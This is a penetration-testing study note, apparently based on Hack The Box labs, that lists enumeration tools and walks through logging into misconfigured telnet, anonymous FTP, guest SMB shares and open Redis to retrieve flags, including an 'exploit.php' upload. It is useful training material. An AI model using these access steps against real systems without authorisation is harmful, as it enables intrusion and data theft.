Enumeration to detect misconfigurations

Basics

When first starting a penetration test or any security evaluation on a target, a primary step is known as Enumeration which involves scanning of the open ports.

Tools

ping - Packet Internet or InterNet Groper

ping <target-ip-addr> -c 4

nmap - Network Mapper

sudo nmap -p- <target-ip-addr> # Scan all ports, takes longer.
sudo nmap -sV <target-ip-addr> # Name and description of identified services.

showmount - mount info for NFS server

showmount -e <target-ip-addr>
/SomeDir (everyone)

sudo mkdir nfs
sudo mount -t nfs <target-ip-addr>/SomeDir nfs

hash-id - Hash Identifier

hash-id -h <hash>
hash-id -f <file-name-path>

smbmap - SMB share drives

smbmap -H <target-ip-addr> -u 'user' -p 'pass'

enum4linux - Windows and Samba system

enum4linux <target-windows-ip-addr>

netdiscover - IP addresses on the network

netdiscover -r <network-addr>/<cidr>

netcat / whatweb / curl / dmitry - Banner Grabbing

netcat <target-ip-addr> <port>
220 (vsFTPd 2.3.4) # FTP
quit
221 Goodbye

whatweb http://<target-ip-addr>

dmitry -p <target-ip-addr> # -p port scan on 150 most used services
dmitry -pb <target-ip-addr> # -b switch version of the program running.

Port numbers

Challenges

telnet(port 23/tcp Linux telnetd)

Telnet is an old service used for remote management of other hosts on the network. Usually, connection requests through telnet are configured with username/password combinations for increased security.

Note: Due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. Some typical important accounts have self-explanatory names, such as: admin, administrator and root leaving open to simple brute-forcing attacks.

$ telnet {target-ip-addr}

Meow login: root

cat flag.txt

FTP(port 21/tcp vsftpd 3.0.3)

File transfer services that may have high chances to be poorly configured, it can be easily misconfigured if not correctly understood. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).

Note: FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. A typical misconfiguration for running FTP services allows the anonymous username, followed by any password whatsoever since the service will disregard the password for this specific account.

$ ftp {target-ip-addr}
Name: anonymous
331 Please specify the password.
Password: anon123
ftp> ls
200 : PORT command successful. Consider using PASV.
150 : Here comes the directory listing.

226 : Directory send OK.

> get flag.txt # Download the file to the same directory.
226 : Transfer complete.

> bye
421 Timeout

# Other options: Make sure from are in right path where the file exists.
> put exploit.php # Upload a file

> mdelete exploit.php # Delete a file

SMB(445/tcp microsoft-ds?)

SMB (Server Message Block) is communication protocol provides shared access to files, printers, and serial ports between endpoints on a network. We mostly see SMB services running on Windows machines. SMB runs at the Application or Presentation layers of the OSI model. Due to this, it relies on lower-level protocols for transport. The Transport layer protocol that Microsoft SMB Protocol is most often used with is NetBIOS over TCP/IP (NBT).

Note. An SMB-enabled storage on the network is called a share . SMB clients are required to provide a username/password combination to see or interact with the contents of the SMB share. A network administrator can sometimes make mistakes and accidentally allow logins without any valid credentials or using either guest_accounts or anonymous log-ons.

Four separate shares:

• ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.
• C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.
• IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
• WorkShares - Custom share.

$ smbclient -L {target-ip-addr}

$ smbclient \\\\{target-ip-addr}\\ADMIN$
    or
$ smbclient \\\\{target-ip-addr}\\C$
NT_STATUS_ACCESS_DENIED

# Seems to be human made, prone to misconfiguration.
$ smbclient \\\\{target-ip-addr}\\WorkShares
smb: \>

ls : listing contents of the directories within the share
cd : changing current directories within the share
get : downloading the contents of the directories within the share
exit : exiting the smb shell

# Passing username and password.
$ smbclient -U 'user' \\\\{target-ip-addr}\\Administrator

Redis(6379/tcp key-value store 5.0.7)

Redis (REmote DIctionary Server), which is an ‘in-memory’ database are the ones that rely essentially on the primary memory for data storage (meaning that the database is managed in the RAM of the system); in contrast to databases that store data on the disk or SSDs. Primary memory is significantly faster than the secondary memory, the data retrieval time in the case of ‘in-memory’ databases is very small, thus offering very efficient & minimal response times.

Note: In-memory databases like Redis are typically used to cache data that is frequently requested for quick retrieval. The Keyspace section provides statistics on the main dictionary of each database. The statistics include the number of keys, and the number of keys with an expiration.

$ redis-cli -h {target-ip-addr}
> info
# Keyspace
db0:keys=4

> select 0 # Select Redis logical database followed by index number.

> keys * # List all the keys present.

> get flag

$ redis-cli -h {target-ip-addr}
> AUTH <passkey>

Source

• Hack The Box